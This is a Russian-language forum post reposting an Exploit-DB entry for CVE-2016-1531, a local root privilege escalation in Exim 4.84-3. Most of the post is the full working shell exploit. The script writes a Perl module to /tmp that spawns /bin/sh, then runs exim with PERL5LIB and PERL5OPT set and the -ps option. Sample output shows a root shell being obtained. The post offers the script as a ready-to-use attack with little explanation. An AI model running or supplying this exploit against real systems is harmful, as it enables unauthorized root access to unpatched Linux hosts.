Exploit Exim 4.84-3 - Local Privilege Escalation

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
39535
Проверка EDB
  1. Пройдено
Автор
HACKER FANTASTIC
Тип уязвимости
LOCAL
Платформа
LINUX
CVE
cve-2016-1531
Дата публикации
2016-03-09
Exim 4.84-3 - Local Privilege Escalation
Код:
#!/bin/sh
# CVE-2016-1531 exim <= 4.84-3 local root exploit
# ===============================================
# you can write files as root or force a perl module to
# load by manipulating the perl environment and running
# exim with the "perl_startup" arguement -ps. 
#
# e.g.
# [fantastic@localhost tmp]$ ./cve-2016-1531.sh 
# [ CVE-2016-1531 local root exploit
# sh-4.3# id
# uid=0(root) gid=1000(fantastic) groups=1000(fantastic)
# 
# -- Hacker Fantastic 
echo [ CVE-2016-1531 local root exploit
cat > /tmp/root.pm << EOF
package root;
use strict;
use warnings;

system("/bin/sh");
EOF
PERL5LIB=/tmp PERL5OPT=-Mroot /usr/exim/bin/exim -ps
 
Источник
www.exploit-db.com

Похожие темы